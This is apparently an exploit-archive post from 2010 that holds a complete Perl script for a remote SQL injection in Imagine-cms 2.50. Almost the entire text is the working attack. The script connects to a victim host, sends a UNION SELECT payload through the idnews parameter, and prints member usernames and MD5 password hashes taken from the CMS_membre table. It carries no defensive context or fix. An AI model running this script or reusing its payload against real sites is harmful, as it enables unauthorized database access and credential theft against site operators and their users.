imaginecms-sql.txt
Posted on 22 July 2010
#!/usr/bin/perl ########################################### # # Script Name : Imagine-cms 2.50 # # Version : 2.50 # # Bug Type : SQL Injection # # Found by : Metropolis # # Home : http://metropolis.fr.cr # # Discovered : 21/07/2010 # # Download app : # http://www.imagine-cms.net/modules/ # telechargement/index.php?page=afficher_souscat&id_cat=2 # ########################################### use IO::Socket; if(@ARGV != 2) { usage(); } else { exploit(); } sub header() { print " - Author: Metropolis "; print "- Imagine-cms <= 2.50 Remote SQL Injection Exploit "; } sub usage() { header(); print "- Usage: $0 <host> <path> "; print "- <host> -> Victim's host ex: www.victim.com "; print "- <path> -> ex: / "; exit(); } sub exploit () { #Our variables... $spserver = $ARGV[0]; $spserver =~ s/(http://)//eg; $sphost = "http://".$spserver; $spdir = $ARGV[1]; $spport = "80"; $sptar = "index.php?page=commentaire&idnews="; $spxp = "-1+and+1=0+union+select+1,2,concat(25552,membre_pseudo,25553,membre_mdp,25554),4,5+from+CMS_membre--"; $spreq = $sphost.$spdir.$sptar.$spxp; #Sending data... header(); print "- Trying to connect: $spserver "; $sp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$spserver", PeerPort => "$spport") || die "- Connection failed... "; print $sp "GET $spreq HTTP/1.1 "; print $sp "Accept: */* "; print $sp "Referer: $sphost "; print $sp "Accept-Language: tr "; print $sp "User-Agent: NukeZilla "; print $sp "Cache-Control: no-cache "; print $sp "Host: $spserver "; print $sp "Connection: close "; print "- Connected... "; while ($answer = <$sp>) { if ($answer =~ /25552(.*?)25553([d,a-f]{32})25554/) { print "- Exploit succeed! "; print "- Username: $1 "; print "- MD5 HASH of PASSWORD: $2 "; exit(); } } #Exploit failed... print "- Exploit failed " }
